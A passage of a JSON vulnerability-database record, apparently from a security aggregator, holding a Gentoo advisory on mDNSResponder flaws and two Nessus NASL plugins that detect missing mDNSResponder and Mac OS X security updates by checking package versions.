"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0989", "CVE-2008-3630", "CVE-2007-3744", "CVE-2007-2386", "CVE-2008-2326", "CVE-2007-3828"], "description": "### Background\n\nmDNSResponder is a component of Apple's Bonjour, an initiative for zero-configuration networking. \n\n### Description\n\nMultiple vulnerabilities have been discovered in mDNSResponder. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local or remote attacker may be able to execute arbitrary code with root privileges or cause a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll mDNSResponder users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/mDNSResponder-212.1\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since November 21, 2009. It is likely that your system is already no longer affected by this issue.", "edition": 1, "modified": "2012-01-22T00:00:00", "published": "2012-01-22T00:00:00", "id": "GLSA-201201-05", "href": "https://security.gentoo.org/glsa/201201-05", "type": "gentoo", "title": "mDNSResponder: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-07T10:53:11", "description": "The remote host is affected by the vulnerability described in GLSA-201201-05\n(mDNSResponder: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in mDNSResponder. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A local or remote attacker may be able to execute arbitrary code with\n root privileges or cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "published": "2012-01-23T00:00:00", "title": "GLSA-201201-05 : mDNSResponder: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0989", "CVE-2008-3630", "CVE-2007-3744", "CVE-2007-2386", "CVE-2008-2326", "CVE-2007-3828"], "modified": "2012-01-23T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mDNSResponder"], "id": "GENTOO_GLSA-201201-05.NASL", "href": "https://www.tenable.com/plugins/nessus/57631", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201201-05.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57631);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-2386\", \"CVE-2007-3744\", \"CVE-2007-3828\", \"CVE-2008-0989\", \"CVE-2008-2326\", \"CVE-2008-3630\");\n script_bugtraq_id(24159, 24924, 25159, 28339, 31091, 31093);\n script_xref(name:\"GLSA\", value:\"201201-05\");\n\n script_name(english:\"GLSA-201201-05 : mDNSResponder: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201201-05\n(mDNSResponder: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in mDNSResponder. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A local or remote attacker may be able to execute arbitrary code with\n root privileges or cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201201-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All mDNSResponder users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/mDNSResponder-212.1'\n NOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since November 21, 2009. It is likely that your system is\n already no longer affected by this issue.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X mDNSResponder UPnP Location Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mDNSResponder\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/mDNSResponder\", unaffected:make_list(\"ge 212.1\"), vulnerable:make_list(\"lt 212.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mDNSResponder\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:42:30", "description": "The remote host is running a version of Mac OS X 10.4 or 10.3 that\ndoes not have Security Update 2007-005 applied. \n\nThis update fixes security flaws in the following applications :\n\nAlias Manager\nBIND\nCoreGraphics\ncrontabs\nfetchmail\nfile\niChat\nmDNSResponder\nPPP\nruby\nscreen\ntexinfo\nVPN", "edition": 26, "published": "2007-05-25T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4573", "CVE-2007-0494", "CVE-2007-1558", "CVE-2007-0751", "CVE-2007-0753", "CVE-2007-0740", "CVE-2007-0493", "CVE-2007-2390", "CVE-2007-0752", "CVE-2007-2386", "CVE-2006-6303", "CVE-2006-4095", "CVE-2006-5467", "CVE-2007-1536", "CVE-2007-0750", "CVE-2005-3011", "CVE-2006-4096"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-005.NASL", "href": "https://www.tenable.com/plugins/nessus/25297", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\nif (NASL_LEVEL < 3000) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(25297);\n script_version (\"1.18\");\n\n script_cve_id(\"CVE-2005-3011\", \"CVE-2006-4095\", \"CVE-2006-4096\", \"CVE-2006-4573\", \"CVE-2006-5467\",\n \"CVE-2006-6303\", \"CVE-2007-0493\", \"CVE-2007-0494\", \"CVE-2007-0740\", \"CVE-2007-0750\",\n \"CVE-2007-0751\", \"CVE-2007-0752\", \"CVE-2007-0753\", \"CVE-2007-1536\", \"CVE-2007-1558\",\n \"CVE-2007-2386\", \"CVE-2007-2390\");\n script_bugtraq_id(24144, 24159);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-005)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes several\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 or 10.3 that\ndoes not have Security Update 2007-005 applied. \n\nThis update fixes security flaws in the following applications :\n\nAlias Manager\nBIND\nCoreGraphics\ncrontabs\nfetchmail\nfile\niChat\nmDNSResponder\nPPP\nruby\nscreen\ntexinfo\nVPN\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=305530\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2007-005 :\n\nhttp://www.apple.com/support/downloads/securityupdate2007005universal.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X mDNSResponder UPnP Location Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(134, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/14\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/05/29\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\nscript_end_attributes();\n\n script_summary(english:\"Check for the presence of Security Update 2007-004\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-9]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-00[5-9]|200[89]-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
